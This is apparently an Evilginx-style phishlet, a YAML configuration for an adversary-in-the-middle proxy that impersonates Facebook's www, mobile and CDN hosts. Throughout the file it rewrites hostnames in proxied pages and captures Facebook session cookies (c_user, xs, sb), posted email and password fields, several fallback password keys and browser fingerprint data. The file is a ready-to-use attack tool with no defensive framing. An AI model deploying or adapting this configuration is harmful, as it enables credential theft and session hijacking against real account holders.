name: "Facebook"
author: "Simpler Hacking"
min_ver: "3.2.0"

proxy_hosts:
  - {
      phish_sub: "www",
      orig_sub: "www",
      domain: "facebook.com",
      session: true,
      is_landing: true,
      auto_filter: true,
    }
  - {
      phish_sub: "facebook",
      orig_sub: "facebook",
      domain: "com",
      session: true,
      is_landing: false,
      auto_filter: true,
    }
  - {
      phish_sub: "m",
      orig_sub: "m",
      domain: "facebook.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "static",
      orig_sub: "static",
      domain: "xx.fbcdn.net",
      session: true,
      is_landing: false,
      auto_filter: true,
    }

sub_filters:
  - {
      triggers_on: "www.facebook.com",
      orig_sub: "www",
      domain: "facebook.com",
      search: "https://{hostname}/",
      replace: "https://{hostname}/",
      mimes: ["text/html", "application/json", "application/javascript"],
    }
  - {
      triggers_on: "facebook.com",
      orig_sub: "facebook",
      domain: "com",
      search: "https://{hostname}/",
      replace: "https://{hostname}/",
      mimes: ["text/html", "application/json", "application/javascript"],
    }
  - {
      triggers_on: "static.xx.fbcdn.net",
      orig_sub: "static",
      domain: "xx.fbcdn.net",
      search: "https://{hostname}/",
      replace: "https://{hostname}/",
      mimes: ["text/html", "application/json", "application/javascript"],
    }
  - {
      triggers_on: "www.facebook.com",
      orig_sub: "static",
      domain: "xx.fbcdn.net",
      search: "https://{hostname}/",
      replace: "https://{hostname}/",
      mimes: ["text/html", "application/json"],
    }
  - {
      triggers_on: "m.facebook.com",
      orig_sub: "m",
      domain: "facebook.com",
      search: "https://{hostname}/",
      replace: "https://{hostname}/",
      mimes: ["text/html", "application/json", "application/x-javascript"],
    }
  - {
      triggers_on: "m.facebook.com",
      orig_sub: "m",
      domain: "facebook.com",
      search: "2F{hostname}",
      replace: "2F{hostname}",
      mimes: ["text/html", "application/json", "application/x-javascript"],
    }
  - {
      triggers_on: "m.facebook.com",
      orig_sub: "m",
      domain: "facebook.com",
      search: '\\\\\\/\\\\\\/{hostname}',
      replace: '\\\\\\/\\\\\\/{hostname}',
      mimes: ["text/html", "application/json", "application/x-javascript"],
    }
  - {
      triggers_on: "m.facebook.com",
      orig_sub: "m",
      domain: "facebook.com",
      search: 'https:\/\/{hostname}\/',
      replace: 'https:\/\/{hostname}\/',
      mimes: ["text/html", "application/json", "application/x-javascript"],
    }
  - {
      triggers_on: "m.facebook.com",
      orig_sub: "m",
      domain: "facebook.com",
      search: "'{domain}';",
      replace: "'{domain}';",
      mimes: ["text/html", "application/json", "application/x-javascript"],
    }
  - {
      triggers_on: "static.xx.fbcdn.net",
      orig_sub: "www",
      domain: "facebook.com",
      search: ':"{domain}";',
      replace: ':"{domain}";',
      mimes: ["text/html", "application/json", "application/x-javascript"],
    }

auth_tokens:
  - domain: ".facebook.com"
    keys: ["c_user", "xs", "sb"]
credentials:
  username:
    key: "email"
    search: "(.*)"
    type: "post"
  password:
    key: "^unenc_password$"
    search: "(.*)"
    type: "post"
  #Custom parameters are added in order to grab the requests made by javascripts injected in order to get device user-agent and other details.
  # key: 'pass'  is added in order to increase the chances of grabbing the pass field if in case failed from above.

  custom:
    - key: "^pass$"
      search: "(.*)"
      type: "post"
    - key: "^Password$"
      search: "(.*)"
      type: "post"
    - key: "UserAgent"
      search: "(.*)"
      type: "post"
    - key: "Browser"
      search: "(.*)"
      type: "post"
    - key: "Engine"
      search: "(.*)"
      type: "post"
    - key: "Platform"
      search: "(.*)"
      type: "post"

login:
  domain: "www.facebook.com"
  path: "/login.php"
